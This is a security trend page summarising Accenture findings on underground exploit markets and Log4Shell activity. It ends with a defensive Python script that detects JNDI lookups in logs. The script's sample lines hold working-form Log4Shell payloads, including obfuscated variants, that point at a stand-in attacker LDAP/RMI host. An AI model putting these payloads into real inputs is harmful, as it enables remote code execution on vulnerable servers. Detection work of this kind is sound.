Trends in Security Information
The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
Vulnerability exploits see high volume buying and selling
to successful ransomware operations
Actors are busy selling or buying CVE exploits
Accenture analyzed 45 instances of underground actors wanting to sell or buy exploits for Common Vulnerabilities and Exposures (CVEs) between August 2021 and October 2021 (Figure 6).
We identified:
• 24 actors buying or selling exploits for 16 CVEs across four forums or marketplaces.
• 16 actors wanting to buy exploits for seven CVEs.
• Nine actors selling exploits for 12 CVEs.
Actors have “top three” vulnerabilities they buy and sell
During the period August – October 2021, the three most popular CVE exploits on the market are for CVE-2021-34473, CVE-2021-20016 and CVE-2021-31206. Accenture analyzed these vulnerabilities in the context of the potential impact of successful exploitation and the assessed intentions of the actors seeking to purchase related exploits.
Accenture found that successful exploitation of each of the noted vulnerabilities enables a remote adversary unauthorized access to a victim network and execution of arbitrary code on a victim host. Analysis of past activities of actors who sought to purchase exploits indicates the actors are financially motivated and that it is likely they intend to use the exploits to facilitate unauthorized network access schemes.
Here is further detail on the most popular CVE exploits:
• CVE-2021-34473: Accenture identified two actors selling the same exploit and eight financially motivated actors wanting to buy an exploit for CVE-2021-34473 in the period of August – October 2021. CVE-2021-34473 (also known as ProxyShell) is an improper input validation vulnerability (CWE-20) in Microsoft Exchange Server 2013-2019. An actor chaining CVE-2021-34473 with CVE-2021-34523 and CVE-2021-31207 could execute arbitrary code with SYSTEM-level privileges on a victim host.
• CVE-2021-20016: Accenture identified four financially motivated actors wanting to buy a CVE-2021-20016 exploit, but did not identify any actors wanting to sell any. CVE-2021-20016 is a SQL injection vulnerability (CWE-89) in SonicWall SSLVPN SMA100 that an attacker could exploit to gain access to and modify a victim host’s backend database, facilitating attacker access to administrator credentials which can be used to remotely execute arbitrary code on a victim’s host.
• CVE-2021-31206: Accenture identified one actor selling and four financially motivated actors wanting to buy a CVE-2021-31206 exploit. CVE-2021-31206 is a data-processing error vulnerability (CWE-19) in Microsoft Exchange Server 2013-2019 that an actor could exploit to enable the execution of arbitrary code on a victim’s host.
Actors begin to capitalize on Log4j vulnerability
On December 9, 2021, Log4j maintainers reported details surrounding a remote code execution vulnerability [22], identified as both CVE-2021-44228 and Log4Shell, that could allow attackers to execute arbitrary code on a vulnerable host. Successful exploitation would allow attackers to execute code without authentication. Because exploitation occurs by logging input, the attack surface for this vulnerability is extremely large. The first reported major exploitation occurred in a popular online video game. Another observed usage of the vulnerability involved a user changing their phone’s device name and using that device name to inject code into the phone manufacturer’s cloud service.
In late December 2021 the first reports appeared of a worm leveraging Log4j in the wild, further evidence of threat actors’ interest in exploiting Log4j, and a new Log4j attack vector via WebSockets. CISA estimates there are 100 million affected software and technology instances across a wide range of technology products and vendors.
In December 2021, Accenture identified underground actors capitalizing on the news of the Log4j vulnerability. Threat actors began identifying ways to incorporate the vulnerability into attacks on vulnerable companies and leveraging the resulting access in botnet operations. In January 2022, actors began to research networks and IP addresses vulnerable to the Log4Shell weakness and started selling their analysis to fellow underground actors.
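Because Log4Shell is triggered by whatever string ends up in a log message, a defender's first detection question is "does any logged field contain a JNDI lookup?" The following Python script is an added example written for this page; it is not part of the Accenture report or of any HSD tooling. It scans constructed sample log lines (the IP addresses are documentation ranges and the lines are invented), first collapsing the nested-lookup forms (`${lower:...}`, `${upper:...}`, `${x:-default}`) that are commonly used to hide the literal text `jndi` from naive substring matching, and then reporting the JNDI scheme of each lookup found. The log format, the `SAMPLE_LOG` contents and the function names are assumptions of this example.

```python
import re
from typing import List, Tuple

# Constructed sample lines (not from the report): an HTTP access log whose
# User-Agent field is attacker-controlled, plus one line with a benign lookup.
# A vulnerable Log4j 2.x would evaluate the ${...} expressions when logging them.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:08:01:15 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:08:01:19 +0000] "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '198.51.100.10 - - [10/Dec/2021:08:01:22 +0000] "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/b}"',
    'device_name="${date:yyyy}-phone" owner=alice',  # benign lookup, must not alert
]

# One layer of the lookup syntaxes used to rebuild the word "jndi" at runtime.
_LOWER = re.compile(r'\$\{lower:([^{}]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^{}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')   # ${name:-default} -> default
# After normalisation, a JNDI lookup and its scheme (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested ${lower:..}, ${upper:..} and ${x:-default} lookups,
    innermost first, until nothing changes or max_rounds is reached (the bound
    keeps a pathologically nested line from looping forever)."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(r'\1', new)
        if new == text:
            return new
        text = new
    return text


def find_jndi_lookups(line: str) -> List[str]:
    """Return the JNDI scheme of every lookup in the line after normalisation;
    an empty list means the line carries no JNDI lookup."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize_lookups(line))]


def scan_log(lines) -> List[Tuple[int, str]]:
    """Scan a sequence of log lines and return (line_number, scheme) per hit,
    with line numbers starting at 1. Lines without a lookup are skipped."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, 1):
        for scheme in find_jndi_lookups(line):
            hits.append((number, scheme))
    return hits


if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
        print("   normalised:", normalize_lookups(SAMPLE_LOG[number - 1]))
```

Running the script flags lines 2, 3 and 4 (the plain, `${lower:}`-wrapped and `${::-}`-wrapped forms) and leaves the `${date:yyyy}` line alone. Detection of this kind is a stop-gap for triage and hunting; it tells you which requests reached a logger, not whether the lookup succeeded, and it complements rather than replaces patching the affected Log4j instances.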